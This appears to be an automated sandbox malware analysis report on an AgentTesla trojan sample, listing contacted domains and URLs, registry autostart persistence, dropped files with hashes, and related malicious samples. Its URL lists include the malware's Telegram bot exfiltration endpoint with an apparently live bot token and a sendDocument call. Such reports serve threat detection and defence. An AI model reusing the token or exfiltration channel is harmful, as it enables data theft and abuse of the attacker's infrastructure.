                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocumentfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designersGSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.telegram.orgMSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers?SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwMSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.tiro.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.goodfont.co.krSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocumentdocument-----MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.carterandcone.comlSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cnSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.telegram.org4MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-user.htmlSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://UhwhaG.comMSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://DynDns.comDynDNSnamejidpasswordPsi/PsiMSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fonts.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleaseSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://api.telegram.orgMSBuild.exe, 00000009.00000002.529774217.00000000031DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.sakkal.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.154.167.220
                                                      		api.telegram.orgUnited Kingdom
                                                      		62041TELEGRAMRUfalse

                                                      General Information

                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:620228
                                                      Start date and time: 04/05/202214:36:072022-05-04 14:36:07 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 30s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438 (renamed file extension from 5438 to exe)
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:29
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.adwa.spyw.evad.winEXE@7/6@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HDC Information:
                                                      • Successful, ratio: 1.1% (good quality ratio 1%)
                                                      • Quality average: 39.8%
                                                      • Quality standard deviation: 21%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 134
                                                      • Number of non-executed functions: 5
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.40.136.238, 23.211.6.115, 40.126.32.133, 20.190.160.14, 20.190.160.20, 40.126.32.140, 40.126.32.76, 40.126.32.72, 20.190.160.17, 40.126.32.74, 23.35.236.56, 20.82.210.154, 20.40.129.122, 80.67.82.211, 80.67.82.235, 20.54.89.106, 52.152.110.14, 52.242.101.226, 20.223.24.244
                                                      • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, iris-de-prod-azsc-frc-b.francecentral.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, store-images.s-microsoft.com, iris-de-prod-azsc-frc.francecentral.cloudapp.azure.com, displaycatalog-rp.md
                                                      • Execution Graph export aborted for target ykVBUY.exe, PID 2976 because it is empty
                                                      • Execution Graph export aborted for target ykVBUY.exe, PID 5256 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      14:37:39API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe modified
                                                      14:37:52API Interceptor615x Sleep call for process: MSBuild.exe modified
                                                      14:37:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ykVBUY C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                      14:38:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ykVBUY C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      149.154.167.220Recibo de la transacci#U00f3n.PDF.exeGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Variant.Ursu.725994.7033.exeGet hashmaliciousBrowse
                                                          Payment Advice 10376525832022.exeGet hashmaliciousBrowse
                                                            PO#7100459206.exeGet hashmaliciousBrowse
                                                              68e7a0fa9f7dbbb34bc4bad97690ea72.exeGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeGet hashmaliciousBrowse
                                                                  Maersk Your Transport Plan has Changed.vbsGet hashmaliciousBrowse
                                                                    New DHL pending delivery documentation.exeGet hashmaliciousBrowse
                                                                      BL-SHIPPING INVOICE DOCS.exeGet hashmaliciousBrowse
                                                                        Recibo de la transacci#U00f3n.PDF.exeGet hashmaliciousBrowse
                                                                          PR 00120181213.xlsxGet hashmaliciousBrowse
                                                                            GhpGcRg80g.exeGet hashmaliciousBrowse
                                                                              Arrival_Notice_BL_No_607954658.vbsGet hashmaliciousBrowse
                                                                                commercial invoice.vbsGet hashmaliciousBrowse
                                                                                  Recibo de la transacci#U00f3n.exeGet hashmaliciousBrowse
                                                                                    doc2022020500991001991.exeGet hashmaliciousBrowse
                                                                                      Payment Advice 10298642022.exeGet hashmaliciousBrowse
                                                                                        doc2022050200100`010100.pdf.exeGet hashmaliciousBrowse
                                                                                          Aviso de Pago 28 Abril 2022.pdf.exeGet hashmaliciousBrowse
                                                                                            Swift_Confirmation_copy_MT103.exeGet hashmaliciousBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              api.telegram.orgRecibo de la transacci#U00f3n.PDF.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              SecuriteInfo.com.Variant.Ursu.725994.7033.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Payment Advice 10376525832022.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              PO#7100459206.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              68e7a0fa9f7dbbb34bc4bad97690ea72.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Maersk Your Transport Plan has Changed.vbsGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              New DHL pending delivery documentation.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              BL-SHIPPING INVOICE DOCS.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Recibo de la transacci#U00f3n.PDF.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              PR 00120181213.xlsxGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              GhpGcRg80g.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Arrival_Notice_BL_No_607954658.vbsGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              commercial invoice.vbsGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Recibo de la transacci#U00f3n.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              doc2022020500991001991.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Payment Advice 10298642022.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              doc2022050200100`010100.pdf.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Aviso de Pago 28 Abril 2022.pdf.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Swift_Confirmation_copy_MT103.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              TELEGRAMRURecibo de la transacci#U00f3n.PDF.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              DCC559C45ECF4159655411999117728F288C7E50C78A2.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.99
                                                                                              SecuriteInfo.com.Variant.Ursu.725994.7033.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Payment Advice 10376525832022.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              PO#7100459206.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              68e7a0fa9f7dbbb34bc4bad97690ea72.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Maersk Your Transport Plan has Changed.vbsGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              New DHL pending delivery documentation.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              BL-SHIPPING INVOICE DOCS.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Recibo de la transacci#U00f3n.PDF.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              PR 00120181213.xlsxGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              GhpGcRg80g.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              VILXNkZtGO.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.99
                                                                                              9Rea46dm7V.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.99
                                                                                              Arrival_Notice_BL_No_607954658.vbsGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              commercial invoice.vbsGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Recibo de la transacci#U00f3n.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              doc2022020500991001991.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Payment Advice 10298642022.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0eRecibo de la transacci#U00f3n.PDF.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              5rvyx5tjz6.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              DUCSetup_v4_1_1.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              swift transfer_20-04-22.xlsx.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              HTtp://F0.tel:8080/XzNJZufp7q4/DMES-WS-SEC?M9A14903Get hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              PO#7100459206.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              https://www.resourceco-au.com/?email=carlos.raso@coasit.org.auGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Samples.xllGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              PO.xllGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              HttP://J4r.XyZ:8080/D4SfJOy4yjH/PO170026713=ylb5900Get hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              BANKING SLIP -30% DEPOSIT ZHONGLIAN YONGSHENG SPECIAL.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              SecuriteInfo.com.ArtemisDEAFCB87BC59.30021.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              RNoQrxkEKl.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Maersk Your Transport Plan has Changed.vbsGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              New DHL pending delivery documentation.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Pnkfvrn.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              Purchase Order.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              MgOelF3Myo.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220
                                                                                              QPG5coTUH4.exeGet hashmaliciousBrowse
                                                                                              • 149.154.167.220

                                                                                              Dropped Files

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exesublime.exeGet hashmaliciousBrowse
                                                                                                Pnkfvrn.exeGet hashmaliciousBrowse
                                                                                                  ( StmItaly S.R.L. Citazione ).exeGet hashmaliciousBrowse
                                                                                                    #U65b0#U547d#U4ee4___xls.exeGet hashmaliciousBrowse
                                                                                                      SALISBUSRY ITEMS - PO-1128-2022.exeGet hashmaliciousBrowse
                                                                                                        invoices.exeGet hashmaliciousBrowse
                                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.26448.exeGet hashmaliciousBrowse
                                                                                                            product list .exeGet hashmaliciousBrowse
                                                                                                              invoice.exeGet hashmaliciousBrowse
                                                                                                                swift.exeGet hashmaliciousBrowse
                                                                                                                  QtPqvVRIQx.exeGet hashmaliciousBrowse
                                                                                                                    Diagram Image.exeGet hashmaliciousBrowse
                                                                                                                      8C363578 & 8C366195.exeGet hashmaliciousBrowse
                                                                                                                        z_CC front and back jpg.exeGet hashmaliciousBrowse
                                                                                                                          8SgJVjkAua.exeGet hashmaliciousBrowse
                                                                                                                            IMUSHH30643885.exeGet hashmaliciousBrowse
                                                                                                                              xyUZcqbbfL.exeGet hashmaliciousBrowse
                                                                                                                                RFQ06112020149.PDF.exeGet hashmaliciousBrowse
                                                                                                                                  CertUtil.exeGet hashmaliciousBrowse
                                                                                                                                    Quotation9011332.pdf.exeGet hashmaliciousBrowse

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1308
                                                                                                                                      Entropy (8bit):5.345811588615766
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE8:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHJ
                                                                                                                                      MD5:EA78C102145ED608EF0E407B978AF339
                                                                                                                                      SHA1:66C9179ED9675B9271A97AB1FC878077E09AB731
                                                                                                                                      SHA-256:8BF01E0C445BD07C0B4EDC7199B7E17DAF1CA55CA52D4A6EAC4EF211C2B1A73E
                                                                                                                                      SHA-512:8C04139A1FC3C3BDACB680EC443615A43EB18E73B5A0CFCA644CB4A5E71746B275B3E238DD1A5A205405313E457BB75F9BBB93277C67AFA5D78DCFA30E5DA02B
                                                                                                                                      Malicious:true
                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ykVBUY.exe.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):841
                                                                                                                                      Entropy (8bit):5.356220854328477
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoIvEE4xDqE4j:MxHKXwYHKhQnoPtHoxHwvEHxDqHj
                                                                                                                                      MD5:486580834B084C92AE1F3866166C9C34
                                                                                                                                      SHA1:C8EB7E1CEF55A6C9EB931487E9AA4A2098AACEDF
                                                                                                                                      SHA-256:65C5B1213E371D449E2A239557A5F250FEA1D3473A1B5C4C5FF7492085F663FB
                                                                                                                                      SHA-512:2C54B638A52AA87F47CAB50859EFF98F07DA02993A596686B5617BA99E73ABFCD104F0F33209E24AFB32E66B4B8A225D4DB2CC79631540C21E7E8C4573DFD457
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                      C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):261728
                                                                                                                                      Entropy (8bit):6.1750840449797675
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:Mao0QHGUQWWimj9q/NLpj/WWqvAw2XpFU4rwOe4ubZSif02RFi/x2uv9FeP:boZTTWxxqVpqWVRXfr802biprVu
                                                                                                                                      MD5:D621FD77BD585874F9686D3A76462EF1
